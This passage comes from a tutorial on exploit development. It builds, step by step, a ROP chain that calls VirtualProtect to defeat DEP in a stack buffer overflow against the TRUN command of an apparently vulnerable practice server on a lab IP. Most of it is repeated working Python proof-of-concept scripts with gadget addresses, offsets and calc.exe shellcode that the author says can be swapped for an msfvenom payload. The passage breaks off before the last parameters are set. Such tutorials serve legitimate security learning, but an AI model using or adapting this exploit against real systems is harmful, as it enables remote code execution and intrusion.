As you will see later on- it is always best to try to save the stack pointer in multiple registers (if possible). The reason for this is simple. The current stack pointer is going to contain an address that is near and around a couple of things: the VirtualProtect() function call and the parameters, as well as our shellcode.

When it comes to exploitation, you never know what the state of the registers could be when you gain control of an application. Placing the current stack pointer into some of the registers allows us to easily be able to make calculations on different things on and around the stack area. If EAX, for example, has a value of 0x00000001 at the time of the crash, but you need a value of 0x12345678 in EAX- it is going to be VERY hard to keep adding to EAX to get the intended value. But if the stack pointer is equal to 0x12345670 at the time of the crash, it is much easier to make calculations, if that value is in EAX to begin with.

Time to break out all of the ROP gadgets we found earlier. It seems as though there are two great options for saving the state of the current stack pointer:

0x77bf58d2: push esp ; pop ecx ; ret  ;  RPCRT4.dll

0x77e4a5e6: mov eax, ecx ; ret  ;  user32.dll

The first ROP gadget will push the value of the stack pointer onto the stack. It will then pop it into ECX- meaning ECX now contains the value of the current stack pointer. The second ROP gadget will move the value of ECX into EAX. At this point, ECX and EAX both contain the current ESP value.

These ROP gadgets will be placed ABOVE the current parameters. The reason is, that these are vital in our calculation process. We are essentially priming the registers before we begin trying to get our intended values into the parameter placeholders. It makes it easier to do this before the VirtualProtect() call is made.

The updated POC:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Beginning of ROP chain

# Saving ESP into ECX and EAX
rop = struct.pack('<L', 0x77bf58d2)  # 0x77bf58d2: push esp ; pop ecx ; ret  ;  (1 found)
rop += struct.pack('<L', 0x77e4a5e6) # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, or where to jump after VirtualProtect call. Not officially apart of the "parameters"
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding between ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(parameters)-len(padding)-len(rop))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+rop+parameters+padding+shellcode+filler)
s.close()

The state of the registers after the two ROP gadgets (remember to place breakpoint on the stack pivot ret instruction and step through with F7 in each debugging step):

As you can see from the POC above, the parameters to VirtualProtect are next up on the stack after the first two ROP gadgets are executed. Since we do not want to overwrite those parameters, we simply would like to “jump” over them for now. To do this, we can simply add to the current value of ESP, with an add esp, VALUE + ret ROP gadget. This will change the value of ESP to be a greater value than the current stack pointer (which currently contains the call to VirtualProtect()). This means we will be farther down in the stack (past the VirtualProtect() call). Since all of our ROP gadgets are ending with a ret, the new stack pointer (which is greater) will be loaded into EIP, because of the ret instruction in the add esp, VALUE + ret. This will make more sense in the screenshots that will be outlined below showing the execution of the ROP gadget. This will be the last ROP gadget that is included before the parameters.

Again, looking through the gadgets created earlier, here is a viable one:

0x6ff821d5: add esp, 0x1C ; ret  ;  USP10.dll

The updated POC:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Beginning of ROP chain

# Saving ESP into ECX and EAX
rop = struct.pack('<L', 0x77bf58d2)  # 0x77bf58d2: push esp ; pop ecx ; ret  ;  (1 found)
rop += struct.pack('<L', 0x77e4a5e6) # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)

# Jump over parameters
rop += struct.pack('<L', 0x6ff821d5) # 0x6ff821d5: add esp, 0x1C ; ret  ;  (1 found)

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, or where to jump after VirtualProtect call. Not officially apart of the "parameters"
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding to reach gadgets
padding = "\x90" * 4

# add esp, 0x1C + ret will land here
rop2 = struct.pack('<L', 0xDEADBEEF)

# Padding between ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding2 = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(parameters)-len(padding)-len(rop)-len(padding2)-len(padding2))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+rop+parameters+padding+rop2+padding2+shellcode+filler)
s.close()

As you can see, 0xDEADBEEF has been added to the POC. If all goes well, after the jump over the VirtualProtect() parameters, EIP should contain the memory address 0xDEADBEEF.

ESP is 0x01BCF9EC before execution:

ESP after add esp, 0x1C:

As you can see at this point, 0xDEADBEEF is pointed to by the stack pointer. The next instruction of this ROP gadget is ret. This instruction will take ESP (0xDEADBEEF) and load it into EIP. What this means, is that if successful, we will have successfully jumped over the VirtualProtect() parameters and resumed execution afterwards.

We have successfully jumped over the parameters!:

Now all of the semantics have been taken care of, it is time to start getting the actual parameters onto the stack.

Okay, For Real This Time

Notice the state of the stack after everything has been executed:

We can clearly see under the kernel32.VirtualProtect pointer, the return parameter located at 0x19FF9F0.

Remember how we saved our old stack pointer into EAX and ECX? We are going to use ECX to do some calculations. Right now, ECX contains a value of 0x19FF9E4. That value is C hex bytes, or 12 decimal bytes away from the return address parameter. Let’s change the value in ECX to equal the value of the return parameter.

We will repeat the following ROP gadget multiple times:

0x77e17270: inc ecx ; ret  ; kernel32.dll

Here is the updated POC:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Beginning of ROP chain

# Saving ESP into ECX and EAX
rop = struct.pack('<L', 0x77bf58d2)  # 0x77bf58d2: push esp ; pop ecx ; ret  ;  (1 found)
rop += struct.pack('<L', 0x77e4a5e6) # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)

# Jump over parameters
rop += struct.pack('<L', 0x6ff821d5) # 0x6ff821d5: add esp, 0x1C ; ret  ;  (1 found)

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, or where to jump after VirtualProtect call. Not officially apart of the "parameters"
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding to reach gadgets
padding = "\x90" * 4

# add esp, 0x1C + ret will land here
# Increase ECX C bytes (ECX right now contains old ESP) to equal address of the VirtualProtect return address place holder
# (no pointers have been created yet)
rop2 = struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)

# Padding between ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding2 = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(parameters)-len(padding)-len(rop)-len(padding2)-len(padding2))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+rop+parameters+padding+rop2+padding2+shellcode+filler)
s.close()

After execution of the ROP gadgets, ECX has been increased to equal the position of return:

Perfect. ECX now contains a value of the return parameter. Let’s knock out lpAddress while we are here. Since lpAddress comes after the return parameter, it will be located 4 bytes after the return parameter on the stack.

Since ECX already contains the return address, adding four bytes would get us to lpAddress. Let’s use ROP to get ECX copied into another register (EDX in this case) and increase EDX by four bytes!

ROP gadgets:

0x6ffb6162: mov edx, ecx ; pop ebp ; ret  ;  msvcrt.dll
0x77f226d5: inc edx ; ret  ;  ntdll.dll

Before we move on, take a closer look at the first ROP gadget. The mov edx, ecx instruction is exactly what is needed. The next instruction is a pop ebp. This, as of right now in its current state, would kill our exploit. Recall, pop will take whatever is on the top of the stack away. As of right now, after the first ROP gadget is loaded into EIP- the second ROP gadget above would be located at ESP. The first ROP gadget would actually take the second ROP gadget and throw it in EBP. We don’t want that.

So, what we can do, is we can add “dummy” data directly AFTER the first ROP gadget. That way, that “dummy” data will get popped into EBP (which we do not care about) and the second ROP gadget will be successfully executed.

Updated POC:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Beginning of ROP chain

# Saving ESP into ECX and EAX
rop = struct.pack('<L', 0x77bf58d2)  # 0x77bf58d2: push esp ; pop ecx ; ret  ;  (1 found)
rop += struct.pack('<L', 0x77e4a5e6) # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)

# Jump over parameters
rop += struct.pack('<L', 0x6ff821d5) # 0x6ff821d5: add esp, 0x1C ; ret  ;  (1 found)

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, or where to jump after VirtualProtect call. Not officially apart of the "parameters"
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding to reach gadgets
padding = "\x90" * 4

# add esp, 0x1C + ret will land here
# Increase ECX C bytes (ECX right now contains old ESP) to equal address of the VirtualProtect return address place holder
# (no pointers have been created yet)
rop2 = struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)

# Move ECX into EDX, and increase it 4 bytes to reach location of VirtualProtect lpAddress parameter
# (no pointers have been created yet. Just preparation)
# Now ECX contains the address of the VirtualProtect return address
# Now EDX (after the inc edx instructions), contains the address of the VirtualProtect lpAddress location
rop2 += struct.pack ('<L', 0x6ffb6162)  # 0x6ffb6162: mov edx, ecx ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x50505050)  # padding to compensate for pop ebp in the above ROP gadget
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)


# Padding between ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding2 = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(parameters)-len(padding)-len(rop)-len(padding2)-len(padding2))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+rop+parameters+padding+rop2+padding2+shellcode+filler)
s.close()

The below screenshots show the stack and registers right before the pop ebp instruction. Notice that EIP is currently one address space above the current ESP. ESP right now contains a memory address that points to 0x50505050, which is our padding.

Disassembly window before execution:

Current state of the registers (EIP contains the address of the mov edx, ecx instruction at the moment:

The current state of the stack. ESP contains the memory address 0x0189FA3C, which points to 0x50505050:

Now, here is the state of the registers after all of the instructions except ret have been executed. EDX now contains the same value as ECX, and EBP contains our intended padding value of 0x50505050!:

Remember that we still need to increase EDX by four bytes. The ROP gadgets after the mov edx, ecx + pop ebp + ret take care of this:

Now we have the memory address of the return parameter placeholder in ECX, and the memory address of the lpAddress parameter placeholder in EDX. Let’s take a look at the stack for a second:

Right now , our shellcode is about 100 hex bytes, or about 256 bytes away, from the current return and lpAddress placeholders. Remember when earlier we saved the old stack pointer into two registers: EAX and ECX? Recall also, that we have already manipulated the value of ECX to equal the value of the return parameter placeholder.

EAX still contains the original stack pointer value. What we need to do, is manipulate EAX to equal the location of our shellcode. Well, that isn’t entirely true. Recall in the updated POC, there is a padding variable of 250 NOPs. All we need is EAX to equal an address within those NOPS that come a bit before the shellcode, since the NOPs will slide into the shellcode.

What we need to do, is increase EAX by about 100 bytes, which should be close enough to our shellcode.

NOTE: This may change going forward. Depending on how many ROP gadgets we need for the ROP chain, our shellcode may get pushed farther down on the stack. If this happens, EAX would no longer be pointing to an area around our shellcode. Again, if this problem arises, we can just come back and repeat the process of adding to EAX again.

Here is a useful ROP gadget for this:

0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  msvcrt.dll

We will need two of these instructions. Also, keep in mind- we have a pop ebp instruction in this ROP gadget. This chain of ROP gadgets should be laid out like this:

  • add eax

  • 0x41414141 (padding to be popped into EBP)

Here is the updated POC:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Beginning of ROP chain

# Saving ESP into ECX and EAX
rop = struct.pack('<L', 0x77bf58d2)  # 0x77bf58d2: push esp ; pop ecx ; ret  ;  (1 found)
rop += struct.pack('<L', 0x77e4a5e6) # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)

# Jump over parameters
rop += struct.pack('<L', 0x6ff821d5) # 0x6ff821d5: add esp, 0x1C ; ret  ;  (1 found)

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, or where to jump after VirtualProtect call. Not officially apart of the "parameters"
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding to reach gadgets
padding = "\x90" * 4

# add esp, 0x1C + ret will land here
# Increase ECX C bytes (ECX right now contains old ESP) to equal address of the VirtualProtect return address place holder
# (no pointers have been created yet)
rop2 = struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)

# Move ECX into EDX, and increase it 4 bytes to reach location of VirtualProtect lpAddress parameter
# (no pointers have been created yet. Just preparation)
# Now ECX contains the address of the VirtualProtect return address
# Now EDX (after the inc edx instructions), contains the address of the VirtualProtect lpAddress location
rop2 += struct.pack ('<L', 0x6ffb6162)  # 0x6ffb6162: mov edx, ecx ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x50505050)  # padding to compensate for pop ebp in the above ROP gadget
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)

# Increase EAX, which contains old ESP, to equal around the address of shellcode
# Determine how far shellcode is away, and add that difference into EAX, because
# EAX is being used for calculations
rop2 += struct.pack('<L', 0x6ff7e29a)    # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack('<L', 0x41414141)    # padding to compensate for pop ebp in the above ROP gadget

# Padding between ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding2 = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(parameters)-len(padding)-len(rop)-len(padding2)-len(padding2))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+rop+parameters+padding+rop2+padding2+shellcode+filler)
s.close()

Now EAX contains an address that is around our shellcode, and will lead to execution of shellcode when it is returned to after the VirtualProtect() call, via a NOP sled:

Up until this point, you may have been asking yourself, “how the heck are those parameters going to get changed to what we want? We are already so far down the stack, and the parameters are already placed in memory!” Here is where the cool (well, cool to me) stuff comes in.

Let’s recall the state of our registers up until this point:

  • ECX: location of return parameter placeholder
  • EDX: location of lpAddress parameter placeholder
  • EAX: location of shellcode (NOPS in front of shellcode)

Essentially, from here- we just want to change what the memory addresses in ECX and EDX point to. Right now, they contain memory addresses- but they are not pointers to anything.

With a mov dword ptr ds:[ecx], eax instruction we could accomplish what we need. What mov dword ptr ds:[ecx], eax will do, is take the DWORD value (size of an x86 register) ECX is currently pointing to (which is the return parameter) and change that value, to make that DWORD in ECX (the address of return) point to EAX’s value (the shellcode address).

To clarify- here we are not making ECX point to EAX. We are making the return address point to the address of the shellcode. That way on the stack, whenever the memory address of return is anywhere, it will automatically be referenced (pointed to) by the shellcode address.

We also need to do the same with EDX. EDX contains the parameter placeholder for lpAddress at the moment. This also needs to point to our shellcode, which is contained in EAX. This means an instruction of mov dword ptr ds:[edx], eax is needed. It will do the same thing mentioned above, but it will use EDX instead of ECX.

Here are two ROP gadgets to accomplish this:

0x6ff63bdb: mov dword [ecx], eax ; pop ebp ; ret  ;  msvcrt.dll
0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  kernel32.dll

As you can see, there are a few pop instructions that need to be accounted for. We will add some padding to the updated POC, found below, to compensate:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Beginning of ROP chain

# Saving ESP into ECX and EAX
rop = struct.pack('<L', 0x77bf58d2)  # 0x77bf58d2: push esp ; pop ecx ; ret  ;  (1 found)
rop += struct.pack('<L', 0x77e4a5e6) # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)

# Jump over parameters
rop += struct.pack('<L', 0x6ff821d5) # 0x6ff821d5: add esp, 0x1C ; ret  ;  (1 found)

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, or where to jump after VirtualProtect call. Not officially apart of the "parameters"
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding to reach gadgets
padding = "\x90" * 4

# add esp, 0x1C + ret will land here
# Increase ECX C bytes (ECX right now contains old ESP) to equal address of the VirtualProtect return address place holder
# (no pointers have been created yet)
rop2 = struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)

# Move ECX into EDX, and increase it 4 bytes to reach location of VirtualProtect lpAddress parameter
# (no pointers have been created yet. Just preparation)
# Now ECX contains the address of the VirtualProtect return address
# Now EDX (after the inc edx instructions), contains the address of the VirtualProtect lpAddress location
rop2 += struct.pack ('<L', 0x6ffb6162)  # 0x6ffb6162: mov edx, ecx ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x50505050)  # padding to compensate for pop ebp in the above ROP gadget
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)

# Increase EAX, which contains old ESP, to equal around the address of shellcode
# Determine how far shellcode is away, and add that difference into EAX, because
# EAX is being used for calculations
rop2 += struct.pack('<L', 0x6ff7e29a)    # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack('<L', 0x41414141)    # padding to compensate for pop ebp in the above ROP gadget

# Replace current VirtualProtect return address pointer (the placeholder) with pointer to shellcode location
rop2 += struct.pack ('<L', 0x6ff63bdb)   # 0x6ff63bdb mov dword [ecx], eax ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP gadget

# Replace VirtualProtect lpAddress placeholder with pointer to shellcode location
rop2 += struct.pack ('<L', 0x77e942cb)   # 0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop esi instruction in the last ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the last ROP gadget

# Padding between ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding2 = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(parameters)-len(padding)-len(rop)-len(padding2)-len(padding2))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+rop+parameters+padding+rop2+padding2+shellcode+filler)
s.close()

A look at the disassembly window as we have approached the first mov gadget:

A look at the stack before the gadget execution:

Look at that! The memory address containing the return parameter (filled with 0x4c4c4c4c originally) placeholder was successfully manipulated to point to the shellcode area!:

The next ROP gadget of mov dword ptr ds:[edx], eax successfully updates the lpAddress parameter, also!:

Awesome. We are halfway there!

One thing you may have noticed from the mov dword ptr ds:[edx], eax ROP gadget is the ret instruction. Instead of a normal return, the gadget had a ret 0x000C instruction.

The number that comes after ret refers to the number of bytes that should be removed from the stack. C, in decimal, is 12. 12 bytes would refer to three 4-byte values in x86 (Each 32-bit DWORD memory address contains 4 bytes. 4 bytes * 3 values = 12 total). These types of returns are used to “clean up” items on the stack, by removing items. Essentially, this just removes the next 3 memory addresses after the ret is executed.

In any case- just as pop, we will have to add some padding to compensate. As mentioned above, a ret 0x000C will remove three memory addresses off of the stack. First, the return instruction takes the current stack pointer at the time of the ret 0x000C instruction (which would be the next ROP gadget in the chain) and loads it into EIP. EIP then executes that address as normally. That is why no padding is needed at that point. The 0x000C portion of the return from the now previous ROP gadget kicks in and takes the next three memory addresses removed off the stack. This is the reason why padding for ret NUM instructions are implemented in the NEXT ROP gadget instead of directly below, like pop padding.

This will be reflected and explained a bit better in the comments of the code for the updated POC that will include the size and flNewProtect parameters. In the meantime, let’s figure out what to do about the last two parameters we have not calculated.

Almost Home

Now all we have left to do is get the size parameter onto the stack (while compensating for the ret 0x000C instruction in the last ROP gadget).

Let’s make the size parameter about 300 hex bytes. This will easily be enough room for a useful piece of shellcode. Here, all we are going to do is spawn calc.exe, so for now 300 will do. The flNewProtect parameter should contain a value of 0x40, which gives the memory page read, write, and execute permissions.

At a high level, we will do exactly what we did last time with the return and lpAddress parameters:

  • Zero out a register for calculations
  • Insert 0x300 into that register
